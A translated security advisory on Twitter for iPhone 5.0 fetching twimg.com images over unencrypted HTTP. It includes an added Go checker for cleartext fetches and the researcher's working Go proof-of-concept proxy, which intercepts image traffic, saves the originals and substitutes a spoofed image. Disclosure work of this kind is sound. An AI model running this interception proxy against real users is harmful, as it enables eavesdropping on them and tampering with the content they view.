Twitter for iPhone Man-in-the-Middle Attack Vulnerability
Published: 2012-11-23
Updated: 2012-11-28
Affected systems:
Twitter Twitter 5.0
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56665
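Twitter is a foreign social networking and microblogging website. It uses wireless networks, wired networks and communication technologies for instant messaging, and is a typical microblogging application.
Twitter for iPhone 5.0 and other versions have a man-in-the-middle vulnerability in their implementation. The Twitter app communicates with the Twitter API over HTTPS, but images received from *.twimg.com are not encrypted and are transferred over plain HTTP. An attacker can exploit this vulnerability to capture and modify the images shown inside the app.
<*Source: Carlos Reventlov
Links: view-source:http://www.mondounix.com/twitter-app-5-0-vulnerable-eavesdropping/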
http://reventlov.com/advisories/twitter-app-vulnerable-to-partial-mitm
http://www.securityfocus.com/archive/1/524812/30/0/threaded
*>
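A defender-side check for the condition described above, as an added example that is not part of the advisory or of the researcher's PoC: it scans request URLs taken from a capture of an app's traffic and reports those that reach a given domain over plain HTTP. The request list is constructed sample data, and the names inDomain and cleartextFetches are assumptions made for this example.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Constructed sample of request URLs, as a proxy log or packet capture of the
// app's traffic might list them (not taken from the advisory).
var sampleRequests = []string{
	"https://api.twitter.com/1.1/statuses/home_timeline.json",
	"http://a.twimg.com/profile_images/1/avatar_normal.jpg",
	"https://b.twimg.com/profile_images/2/avatar_normal.png",
	"http://eviltwimg.com/x.jpg",
	"HTTP://C.TWIMG.COM:80/media/3.gif",
	"http://twimg.com./logo.png",
}

// inDomain reports whether host is domain itself or a subdomain of it.
// A bare suffix test would also match unrelated names such as "eviltwimg.com".
func inDomain(host, domain string) bool {
	host = strings.TrimSuffix(strings.ToLower(host), ".")
	return host == domain || strings.HasSuffix(host, "."+domain)
}

// cleartextFetches returns the requests that reach domain over plain HTTP.
func cleartextFetches(requests []string, domain string) []string {
	var hits []string
	for _, raw := range requests {
		u, err := url.Parse(raw)
		if err != nil {
			continue // unparsable entry: cannot be classified
		}
		if strings.EqualFold(u.Scheme, "http") && inDomain(u.Hostname(), domain) {
			hits = append(hits, raw)
		}
	}
	return hits
}

func main() {
	for _, r := range cleartextFetches(sampleRequests, "twimg.com") {
		fmt.Println("cleartext asset fetch:", r)
	}
}
```

Any URL it reports is a resource that should be requested over HTTPS instead.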
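Test method:
--------------------------------------------------------------------------------
WARNING
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!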
/*
  Twitter App, eavesdropping PoC
  Written by Carlos Reventlov <[email protected]>
  License MIT
*/
package main

import (
	"fmt"
	"github.com/xiam/hyperfox/proxy"
	"github.com/xiam/hyperfox/tools/logger"
	"io"
	"log"
	"os"
	"path"
	"strconv"
	"strings"
)

// Image sent in place of every response from a twimg.com host.
const imageFile = "spoof.jpg"

// Abort at startup if the replacement image is missing.
func init() {
	_, err := os.Stat(imageFile)
	if err != nil {
		panic(err.Error())
	}
}

// replaceAvatar saves the original image and substitutes imageFile for it.
func replaceAvatar(pr *proxy.ProxyRequest) error {
	host := pr.Response.Request.Host
	if strings.HasSuffix(host, "twimg.com") {
		if pr.Response.ContentLength != 0 {
			file := "saved" + proxy.PS + pr.FileName
			var ext string
			contentType := pr.Response.Header.Get("Content-Type")
			switch contentType {
			case "image/jpeg":
				ext = ".jpg"
			case "image/gif":
				ext = ".gif"
			case "image/png":
				ext = ".png"
			case "image/tiff":
				ext = ".tiff"
			}
			if ext != "" {
				fmt.Printf("** Saving image.\n")
				os.MkdirAll(path.Dir(file), os.ModeDir|os.FileMode(0755))
				fp, err := os.Create(file)
				if err != nil {
					// Return the error instead of building and discarding it.
					return fmt.Errorf("Could not open file %s for writing.", file)
				}
				io.Copy(fp, pr.Response.Body)
				fp.Close()
				pr.Response.Body.Close()
			}
		}
		fmt.Printf("** Sending bogus image.\n")
		// Open the replacement only for matching hosts, so that no file
		// handle is leaked on unrelated requests.
		stat, err := os.Stat(imageFile)
		if err != nil {
			return err
		}
		image, err := os.Open(imageFile)
		if err != nil {
			return err
		}
		pr.Response.ContentLength = stat.Size()
		pr.Response.Header.Set("Content-Type", "image/jpeg")
		pr.Response.Header.Set("Content-Length",
			strconv.Itoa(int(pr.Response.ContentLength)))
		pr.Response.Body = image
	}
	return nil
}

func main() {
	p := proxy.New()
	p.AddDirector(logger.Client(os.Stdout))
	p.AddInterceptor(replaceAvatar)
	p.AddLogger(logger.Server(os.Stdout))
	var err error
	err = p.Start()
	if err != nil {
		log.Printf("Failed to bind: %s.\n", err.Error())
	}
}
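Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
Twitter
-------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page: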